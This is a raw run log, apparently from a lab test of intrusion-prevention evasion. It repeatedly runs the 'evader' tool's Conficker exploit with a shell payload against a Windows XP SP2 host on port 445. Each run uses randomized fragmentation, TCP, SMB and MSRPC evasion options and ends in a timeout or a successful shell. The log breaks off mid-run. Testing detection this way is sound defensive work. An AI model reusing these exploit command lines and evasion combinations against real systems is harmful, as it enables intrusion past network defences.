- 8354 runs averaging 1.94 runs / second ; progress: 4309/43200...............
- 8369 runs averaging 1.94 runs / second ; progress: 4314/43200....
- 8373 runs averaging 1.94 runs / second ; progress: 4319/43200.....
- 8378 runs averaging 1.94 runs / second ; progress: 4324/43200......Pid 1662 timed out - killed
- 2015-06-08 00:31:38 INFO
- Timed out (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25353 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=fWA5nBt8494 --evasion=[msrpc_bind,msrpc_req]smb_fnameobf,"change_case|add_paths" --evasion=[smb_connect,end]tcp_paws,"5","238199066","random_alpha" --evasion=[smb_opentree,end]tcp_urgent,"50%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed fWA5nBt8495
- The following evasions are applied from stage smb_connect to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 238199066> and has random alpha bytes as payload
- The following evasions are applied from stage smb_opentree to end:
- - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - The SMB filename is obfuscated:
- * Random characters case is changed
- * Dummy paths are added ( a/b -> a/c/../b )
- Info: NetBIOS connection 10.62.90.110:25353 -> 10.35.1.207:445
- Terminated
- 8385 runs averaging 1.94 runs / second ; progress: 4329/43200.....
- 8390 runs averaging 1.94 runs / second ; progress: 4334/43200.
- 8391 runs averaging 1.93 runs / second ; progress: 4339/43200.......
- 8398 runs averaging 1.93 runs / second ; progress: 4344/43200............
- 8410 runs averaging 1.93 runs / second ; progress: 4349/43200..........Pid 2268 timed out - killed
- 2015-06-08 00:32:02 INFO
- Timed out (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55553 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=kxyX01oYSMk --evasion=[smb_opentree,end]smb_chaff,"13","write_flag","alphanum" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"50%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed kxyX01oYSMm
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - 50% probability to add a random alphaurgent data byte to a TCP segment.
- The following evasions are applied from stage smb_opentree to end:
- - Before every 13th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random alphanumeric payload
- Info: NetBIOS connection 10.62.90.117:55553 -> 10.35.1.207:445
- Terminated
- 2015-06-08 00:32:02 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=53177 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=sooPHhEIT8g --evasion=[smb_connect,end]ipv4_frag,"104" --evasion=[smb_opentree,end]smb_decoytrees,"5","2","3","random_msrpcreq" --verifydelay=1000 --payload=shell
- Info: Using random seed sooPHhEIT8i
- The following evasions are applied from stage smb_connect to end:
- - IPv4 fragments with at most 104 bytes per fragment
- The following evasions are applied from stage smb_opentree to end:
- - Before normal SMB writes, 5 SMB trees are opened and 2 writes are performed to them. The write payload is 3 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.110:53177 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ....
- 8426 runs averaging 1.94 runs / second ; progress: 4354/43200.........
- 8435 runs averaging 1.94 runs / second ; progress: 4359/43200.........
- 8444 runs averaging 1.93 runs / second ; progress: 4364/43200....Pid 2527 timed out - killed
- 2015-06-08 00:32:18 INFO
- Timed out (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60882 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=T6XfWoQScYo --evasion=[msrpc_bind,msrpc_req]msrpc_ndrflag,"char_unspec","float_cray","byte3_nonzero","byte4_nonzero" --evasion=[smb_opentree,end]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed T6XfWoQScYp
- The following evasions are applied from stage smb_opentree to end:
- - Add a zero urgent data byte to every 2 TCP segment.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - MSRPC NDR flag is modified:
- * Unspecified character encoding
- * Cray floating point value encoding
- * Reserved 3rd byte is set to a random non-zero value
- * Reserved 4th byte is set to a random non-zero value
- Info: NetBIOS connection 10.62.90.119:60882 -> 10.35.1.207:445
- Terminated
- ..
- 8451 runs averaging 1.93 runs / second ; progress: 4369/43200...............
- 8466 runs averaging 1.94 runs / second ; progress: 4374/43200......
- 8472 runs averaging 1.93 runs / second ; progress: 4379/43200
- 8472 runs averaging 1.93 runs / second ; progress: 4384/43200...
- 8475 runs averaging 1.93 runs / second ; progress: 4389/43200..........
- 8485 runs averaging 1.93 runs / second ; progress: 4394/43200.....
- 8490 runs averaging 1.93 runs / second ; progress: 4399/43200.......
- 8497 runs averaging 1.93 runs / second ; progress: 4404/43200
- 8497 runs averaging 1.93 runs / second ; progress: 4409/43200....
- 8501 runs averaging 1.93 runs / second ; progress: 4414/43200........2015-06-08 00:33:08 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59785 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=qI+MyxnbeGg --evasion=[start,msrpc_bind]ipv4_frag,"1464" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","5","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed qI+MyxnbeGi
- The following evasions are applied from stage start to msrpc_bind:
- - IPv4 fragments with at most 1464 bytes per fragment
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.118:59785 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 8512 runs averaging 1.93 runs / second ; progress: 4419/43200.....2015-06-08 00:33:12 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15707 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=i/S3e+bhers --evasion=[smb_openpipe,msrpc_bind]smb_fnameobf,"change_case|add_null_trailer" --evasion=[msrpc_req,end]tcp_paws,"50%","196394028","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed i/S3e+bheru
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - The SMB filename is obfuscated:
- * Random characters case is changed
- * A 0x00 and random alphanumeric characters are appended to the filename
- The following evasions are applied from stage msrpc_req to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 196394028> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.118:15707 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 8520 runs averaging 1.93 runs / second ; progress: 4424/43200......
- 8526 runs averaging 1.92 runs / second ; progress: 4429/43200....
- 8530 runs averaging 1.92 runs / second ; progress: 4434/43200.....
- 8535 runs averaging 1.92 runs / second ; progress: 4439/43200....2015-06-08 00:33:33 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=10990 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=KwjnkM1JXmw --evasion=[smb_connect,smb_openpipe]smb_decoytrees,"7","7","8","random_msrpcbind" --evasion=[msrpc_req,end]tcp_chaff,"1","chksum|nullchksum|nullflag|shorthdr|longhdr","zero" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"50%","161608787","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed KwjnkM1JXmw
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - Before normal SMB writes, 7 SMB trees are opened and 7 writes are performed to them. The write payload is 8 bytes of MSRPC bind-like data.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 161608787> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage msrpc_req to end:
- - With every 1 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * NULL TCP checksum.
- * NULL TCP control flags.
- * TCP header shorter than 20 bytes
- * TCP header longer than packet total size
- * Duplicate packet has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.118:10990 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .
- 8541 runs averaging 1.92 runs / second ; progress: 4444/43200.....
- 8546 runs averaging 1.92 runs / second ; progress: 4449/43200.......
- 8553 runs averaging 1.92 runs / second ; progress: 4454/43200..Pid 4069 timed out - killed
- 2015-06-08 00:33:46 INFO
- Timed out (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45678 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=nv0/I9X2yH0 --evasion=[start,smb_openpipe]ipv4_frag,"1264" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"50%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed nv0/I9X2yH2
- The following evasions are applied from stage start to smb_openpipe:
- - IPv4 fragments with at most 1264 bytes per fragment
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 50% probability to add a random alphaurgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.111:45678 -> 10.35.1.207:445
- Terminated
- ...
- 8559 runs averaging 1.92 runs / second ; progress: 4459/43200
- 8559 runs averaging 1.92 runs / second ; progress: 4464/43200..
- 8561 runs averaging 1.92 runs / second ; progress: 4469/43200Pid 4398 timed out - killed
- 2015-06-08 00:34:00 INFO
- Timed out (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60638 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=20s+1xE/E2Q --evasion=[msrpc_req,end]netbios_chaff,"1","empty_keepalive|http_post|msrpc_req" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"75%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed 20s+1xE/E2T
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - 75% probability to add a zero urgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_req to end:
- - Before every 1th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
- Info: NetBIOS connection 10.62.90.115:60638 -> 10.35.1.207:445
- Terminated
- ...........
- 8573 runs averaging 1.92 runs / second ; progress: 4475/432002015-06-08 00:34:05 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22375 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=XYxpSCVMOvI --evasion=[smb_connect,msrpc_bind]smb_writeandxpad,"509","zero" --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","43065069","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed XYxpSCVMOvJ
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - 509 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 43065069> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.111:22375 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...........
- 8585 runs averaging 1.92 runs / second ; progress: 4480/43200............
- 8597 runs averaging 1.92 runs / second ; progress: 4485/43200..............
- 8611 runs averaging 1.92 runs / second ; progress: 4490/43200..............
- 8625 runs averaging 1.92 runs / second ; progress: 4495/43200...........
- 8636 runs averaging 1.92 runs / second ; progress: 4500/43200.Pid 4839 timed out - killed
- 2015-06-08 00:34:31 INFO
- Timed out (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22602 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=b9XU0yKQnxs --evasion=[start,netbios_connect]ipv4_frag,"48" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
- Info: Using random seed b9XU0yKQnxt
- The following evasions are applied from stage start to netbios_connect:
- - IPv4 fragments with at most 48 bytes per fragment
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 75% probability to add a random urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.113:22602 -> 10.35.1.207:445
- Terminated
- .........
- 8647 runs averaging 1.92 runs / second ; progress: 4505/43200............2015-06-08 00:34:38 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25522 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=F5bVtHv8w7c --evasion=[smb_openpipe,msrpc_req]smb_fnameobf,"change_case" --evasion=[start,end]tcp_paws,"3","126118068","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed F5bVtHv8w7c
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 126118068> and has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - The SMB filename is obfuscated:
- * Random characters case is changed
- Info: NetBIOS connection 10.62.90.111:25522 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ....
- 8664 runs averaging 1.92 runs / second ; progress: 4510/43200..........
- 8674 runs averaging 1.92 runs / second ; progress: 4515/43200.......
- 8681 runs averaging 1.92 runs / second ; progress: 4520/43200.........
- 8690 runs averaging 1.92 runs / second ; progress: 4525/43200.............
- 8703 runs averaging 1.92 runs / second ; progress: 4530/43200...........
- 8714 runs averaging 1.92 runs / second ; progress: 4535/43200..........
- 8724 runs averaging 1.92 runs / second ; progress: 4540/43200..........
- 8734 runs averaging 1.92 runs / second ; progress: 4545/43200.......2015-06-08 00:35:18 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=42635 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=TuoN/Fks6dA --evasion=[smb_openpipe,msrpc_bind]ipv4_frag,"24" --evasion=[smb_opentree,smb_openpipe]ipv4_opt,"3","inc","alphanumrandomized" --evasion=[msrpc_bind,end]smb_decoytrees,"4","6","8","random_msrpcreq" --verifydelay=1000 --payload=shell
- Info: Using random seed TuoN/Fks6dB
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload except that alphanumeric characters are randomized
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - IPv4 fragments with at most 24 bytes per fragment
- The following evasions are applied from stage msrpc_bind to end:
- - Before normal SMB writes, 4 SMB trees are opened and 6 writes are performed to them. The write payload is 8 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.118:42635 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .......
- 8749 runs averaging 1.92 runs / second ; progress: 4550/43200.............
- 8762 runs averaging 1.92 runs / second ; progress: 4555/43200...........2015-06-08 00:35:28 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=36182 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=HBD+cGWNJlg --evasion=[netbios_connect,end]ipv4_opt,"3","inc","zero" --evasion=[msrpc_bind,end]tcp_paws,"3","51055844","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed HBD+cGWNJlg
- The following evasions are applied from stage netbios_connect to end:
- - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has NULL bytes for payload
- The following evasions are applied from stage msrpc_bind to end:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 51055844> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.119:36182 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ........
- 8782 runs averaging 1.93 runs / second ; progress: 4560/43200
- 8782 runs averaging 1.92 runs / second ; progress: 4565/43200..2015-06-08 00:35:37 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=35443 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=PMOGjF6h7ww --evasion=[smb_connect,smb_openpipe]smb_chaff,"21","write_flag","msrpc" --evasion=[smb_opentree,end]tcp_paws,"5","8","random" --verifydelay=1000 --payload=shell
- Info: Using random seed PMOGjF6h7ww
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
- The following evasions are applied from stage smb_opentree to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.111:35443 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ......
- 8791 runs averaging 1.92 runs / second ; progress: 4570/43200............
- 8803 runs averaging 1.92 runs / second ; progress: 4575/43200..................
- 8821 runs averaging 1.93 runs / second ; progress: 4580/43200............
- 8833 runs averaging 1.93 runs / second ; progress: 4585/43200.......
- 8840 runs averaging 1.93 runs / second ; progress: 4590/43200......
- 8846 runs averaging 1.92 runs / second ; progress: 4595/43200....
- 8850 runs averaging 1.92 runs / second ; progress: 4600/43200.........
- 8859 runs averaging 1.92 runs / second ; progress: 4605/43200.............
- 8872 runs averaging 1.92 runs / second ; progress: 4611/43200...2015-06-08 00:36:21 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=35389 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=T0PbYlV/b4Y --evasion=[smb_openpipe,end]smb_fnameobf,"add_paths" --evasion=[msrpc_req,end]tcp_paws,"75%","8","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed T0PbYlV/b4Z
- The following evasions are applied from stage smb_openpipe to end:
- - The SMB filename is obfuscated:
- * Dummy paths are added ( a/b -> a/c/../b )
- The following evasions are applied from stage msrpc_req to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.118:35389 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ....Pid 6902 timed out - killed
- 2015-06-08 00:36:24 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52459 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=4c8g/DIFW7I --evasion=[smb_openpipe,msrpc_req]smb_chaff,"13","write_flag","zero" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed 4c8g/DIFW7L
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 75% probability to add a random alphaurgent data byte to a TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Before every 13th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
- Info: NetBIOS connection 10.62.90.114:52459 -> 10.35.1.207:445
- Terminated
- ..
- 8883 runs averaging 1.92 runs / second ; progress: 4616/43200......
- 8889 runs averaging 1.92 runs / second ; progress: 4621/43200....
- 8893 runs averaging 1.92 runs / second ; progress: 4626/43200.........
- 8902 runs averaging 1.92 runs / second ; progress: 4631/43200
- 8902 runs averaging 1.92 runs / second ; progress: 4636/43200
- 8902 runs averaging 1.92 runs / second ; progress: 4641/43200......
- 8908 runs averaging 1.92 runs / second ; progress: 4646/43200.........
- 8917 runs averaging 1.92 runs / second ; progress: 4651/43200.......
- 8924 runs averaging 1.92 runs / second ; progress: 4656/43200..
- 8926 runs averaging 1.92 runs / second ; progress: 4661/43200.
- 8927 runs averaging 1.91 runs / second ; progress: 4666/43200.Pid 7659 timed out - killed
- 2015-06-08 00:37:18 INFO
- Timed out (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=48863 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=iOiNE51qbIE --evasion=[netbios_connect,msrpc_bind]tcp_urgent,"8","random_alphanum" --evasion=[smb_openpipe,end]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed iOiNE51qbIG
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - Add a random alphanumeric urgent data byte to every 8 TCP segment.
- The following evasions are applied from stage smb_openpipe to end:
- - Add a random alphanumeric urgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.117:48863 -> 10.35.1.207:445
- Terminated
- .....
- 8934 runs averaging 1.91 runs / second ; progress: 4671/43200..Pid 7806 timed out - killed
- 2015-06-08 00:37:22 INFO
- Timed out (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52933 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=Iv5+sA53FSw --evasion=[smb_opentree,smb_openpipe]smb_chaff,"75%","write_flag","msrpc" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed Iv5+sA53FSw
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - 25% probability to add a zero urgent data byte to a TCP segment.
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - 75% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
- Info: NetBIOS connection 10.62.90.116:52933 -> 10.35.1.207:445
- Terminated
- .....Pid 7870 timed out - killed
- 2015-06-08 00:37:25 INFO
- Timed out (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25618 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=sgNECLIvgpo --evasion=[smb_connect,end]tcp_chaff,"8","nullchksum|nullflag|shorthdr","shuffle" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"3","zero" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
- Info: Using random seed sgNECLIvgpq
- The following evasions are applied from stage smb_connect to end:
- - With every 8 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * NULL TCP checksum.
- * NULL TCP control flags.
- * TCP header shorter than 20 bytes
- * Duplicate packet has shuffled original payload
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Add a zero urgent data byte to every 3 TCP segment.
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to add a random urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.110:25618 -> 10.35.1.207:445
- Terminated
- 8943 runs averaging 1.91 runs / second ; progress: 4676/43200...................
- 8962 runs averaging 1.91 runs / second ; progress: 4681/43200.........2015-06-08 00:37:33 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57107 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=2vlqNASig6Q --evasion=[smb_openpipe,end]smb_decoytrees,"4","2","3","random_msrpcreq" --evasion=[smb_openpipe,end]tcp_chaff,"21","nullchksum|nullflag|outofwindow|shorthdr|longhdr","unmodified" --verifydelay=1000 --payload=shell
- Info: Using random seed 2vlqNASig6T
- The following evasions are applied from stage smb_openpipe to end:
- - Before normal SMB writes, 4 SMB trees are opened and 2 writes are performed to them. The write payload is 3 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.113:57107 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .......2015-06-08 00:37:35 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17874 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=TcBcODpf5zs --evasion=[msrpc_req,end]tcp_paws,"1","7","zero" --evasion=[netbios_connect,msrpc_req]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed TcBcODpf5zt
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage msrpc_req to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.115:17874 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .
- 8981 runs averaging 1.92 runs / second ; progress: 4686/43200..............
- 8995 runs averaging 1.92 runs / second ; progress: 4691/43200.....Pid 7992 timed out - killed
- 2015-06-08 00:37:44 INFO
- Timed out (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26909 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=CqYGL7dhLx0 --evasion=[smb_connect,smb_opentree]tcp_chaff,"50%","chksum|outofwindow|shorthdr","zero" --evasion=[msrpc_req,end]tcp_paws,"1","6","zero" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed CqYGL7dhLx0
